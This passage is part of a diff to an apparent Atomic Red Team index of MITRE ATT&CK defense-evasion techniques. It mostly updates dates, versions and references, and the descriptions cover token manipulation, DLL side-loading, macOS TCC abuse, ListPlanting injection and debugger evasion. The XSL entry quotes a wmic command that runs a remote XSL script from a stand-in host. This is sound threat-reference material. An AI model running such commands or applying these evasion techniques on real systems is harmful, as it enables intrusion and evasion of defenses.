       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1221
     atomic_tests:
     - name: WINWORD Remote Template Injection
@@ -28402,7 +28719,7 @@ defense-evasion:
         name: command_prompt
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -28499,7 +28816,6 @@ defense-evasion:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1027.002:
     technique:
@@ -28562,7 +28878,6 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1027.002
     atomic_tests:
     - name: Binary simply packed by UPX (linux)
@@ -28684,7 +28999,7 @@ defense-evasion:
         description: 'Kaspersky Lab''s Global Research and Analysis Team. (2015, February).
           Equation Group: Questions and Answers. Retrieved December 21, 2015.'
         url: https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064459/Equation_group_questions_and_answers.pdf
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-29T15:12:11.024Z'
       name: Hidden File System
       description: |-
         Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
@@ -28711,8 +29026,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1055.005:
     technique:
@@ -28740,7 +29053,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -28784,8 +29097,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1622:
     technique:
@@ -28840,7 +29151,7 @@ defense-evasion:
         Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
 
         Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-16T15:05:55.918Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Debugger Evasion
       x_mitre_detection: |-
@@ -28860,7 +29171,6 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1622
     atomic_tests:
     - name: Detect a Debugger Presence in the Machine
@@ -28922,7 +29232,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1036.006
     atomic_tests:
     - name: Space After Filename (Manual)
@@ -29007,7 +29316,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests:
     - name: Mimikatz Pass the Hash
@@ -29132,7 +29440,7 @@ defense-evasion:
         name: powershell
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -29182,7 +29490,6 @@ defense-evasion:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests:
     - name: DLL Side-Loading using the Notepad++ GUP.exe binary
@@ -29301,7 +29608,7 @@ defense-evasion:
         elevation_required: true
   T1216.002:
     technique:
-      modified: '2024-04-18T23:51:40.464Z'
+      modified: '2024-09-12T19:42:21.547Z'
       name: SyncAppvPublishingServer
       description: "Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution
         of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands.
@@ -29361,8 +29668,8 @@ defense-evasion:
       - source_name: 7 - appv
         description: Nick Landers. (2017, August 8). Need a signed alternative to
           Powershell.exe? SyncAppvPublishingServer in Win10 has got you covered..
-          Retrieved February 6, 2024.
-        url: https://twitter.com/monoxgas/status/895045566090010624
+          Retrieved September 12, 2024.
+        url: https://x.com/monoxgas/status/895045566090010624
       - source_name: 3 - appv
         description: 'Raj Chandel. (2022, March 17). Indirect Command Execution: Defense
           Evasion (T1202). Retrieved February 6, 2024.'
@@ -29379,37 +29686,18 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -29417,6 +29705,8 @@ defense-evasion:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -29424,7 +29714,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -29454,7 +29744,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -29500,7 +29789,7 @@ defense-evasion:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -29545,8 +29834,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1027.007:
     technique:
@@ -29591,7 +29878,7 @@ defense-evasion:
         To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
 
         Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-08-23T18:32:46.899Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Obfuscated Files or Information: Dynamic API Resolution'
       x_mitre_detection: ''
@@ -29605,7 +29892,6 @@ defense-evasion:
       - 'Process: OS API Execution'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.007
     atomic_tests:
     - name: Dynamic API Resolution-Ninja-syscall
@@ -29647,53 +29933,24 @@ defense-evasion:
         elevation_required: true
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -29710,6 +29967,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -29724,16 +29984,47 @@ defense-evasion:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests:
     - name: Process injection ListPlanting
@@ -29773,7 +30064,7 @@ defense-evasion:
         elevation_required: true
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -29818,9 +30109,8 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -29877,8 +30167,8 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -29887,57 +30177,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1220:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Avneet Singh
-      - Casey Smith
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
-      created: '2018-10-17T00:14:20.652Z'
-      x_mitre_version: '1.2'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1220
-        url: https://attack.mitre.org/techniques/T1220
-      - source_name: Reaqta MSXSL Spearphishing MAR 2018
-        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
-        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
-          MSXSL. Retrieved July 3, 2018.
-      - source_name: Twitter SquiblyTwo Detection APR 2018
-        url: https://twitter.com/dez_/status/986614411711442944
-        description: Desimone, J. (2018, April 18). Status Update. Retrieved July
-          3, 2018.
-      - source_name: LOLBAS Wmic
-        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
-        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
-      - source_name: Microsoft msxsl.exe
-        url: https://www.microsoft.com/download/details.aspx?id=21714
-        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
-          Retrieved July 3, 2018.
-      - source_name: Penetration Testing Lab MSXSL July 2017
-        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
-        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
-          July 3, 2018.
-      - source_name: XSL Bypass Mar 2019
-        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
-        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
-          Proxy Code Execution. Retrieved August 2, 2019.
-      - source_name: Microsoft XSLT Script Mar 2017
-        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
-        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
-          Using <msxsl:script>. Retrieved July 3, 2018.
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-09-12T19:40:12.337Z'
+      name: XSL Script Processing
       description: |-
         Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
 
@@ -29955,29 +30199,73 @@ defense-evasion:
 
         * Local File: <code>wmic process list /FORMAT:evil[.]xsl</code>
         * Remote File: <code>wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”</code>
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XSL Script Processing
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Avneet Singh
+      - Casey Smith
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
 
         The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
-      kill_chain_phases:
-      - phase_name: defense-evasion
-        kill_chain_name: mitre-attack
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
-      x_mitre_system_requirements:
-      - Microsoft Core XML Services (MSXML) or access to wmic.exe
       x_mitre_defense_bypassed:
       - Anti-virus
       - Digital Certificate Validation
       - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_system_requirements:
+      - Microsoft Core XML Services (MSXML) or access to wmic.exe
+      type: attack-pattern
+      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+      created: '2018-10-17T00:14:20.652Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1220
+        external_id: T1220
+      - source_name: Reaqta MSXSL Spearphishing MAR 2018
+        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+          MSXSL. Retrieved July 3, 2018.
+        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+      - source_name: Twitter SquiblyTwo Detection APR 2018
+        description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+          12, 2024.
+        url: https://x.com/dez_/status/986614411711442944
+      - source_name: LOLBAS Wmic
+        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+      - source_name: Microsoft msxsl.exe
+        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+          Retrieved July 3, 2018.
+        url: https://www.microsoft.com/download/details.aspx?id=21714
+      - source_name: Penetration Testing Lab MSXSL July 2017
+        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+          July 3, 2018.
+        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+      - source_name: XSL Bypass Mar 2019
+        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+          Proxy Code Execution. Retrieved August 2, 2019.
+        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+      - source_name: Microsoft XSLT Script Mar 2017
+        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+          Using <msxsl:script>. Retrieved July 3, 2018.
+        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1220
     atomic_tests:
     - name: MSXSL Bypass using local files
@@ -30166,7 +30454,7 @@ defense-evasion:
         description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
           Retrieved July 10, 2017.'
         source_name: WireLurker
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T22:32:25.985Z'
       name: 'Hide Artifacts: Hidden Files and Directories'
       description: |-
         Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
@@ -30194,8 +30482,6 @@ defense-evasion:
       - Host forensic analysis
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.001
     atomic_tests:
     - name: Create a hidden file in a hidden directory
@@ -30421,42 +30707,7 @@ defense-evasion:
         elevation_required: true
   T1578.001:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
-      type: attack-pattern
-      created: '2020-06-09T15:33:13.563Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.001
-        url: https://attack.mitre.org/techniques/T1578/001
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS Cloud Trail Backup API
-        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
-        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
-          Retrieved April 27, 2020.
-      - source_name: Azure - Monitor Logs
-        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
-        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
-          Retrieved May 1, 2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      - source_name: GCP - Creating and Starting a VM
-        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
-        description: Google. (2020, April 23). Creating and Starting a VM instance.
-          Retrieved May 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
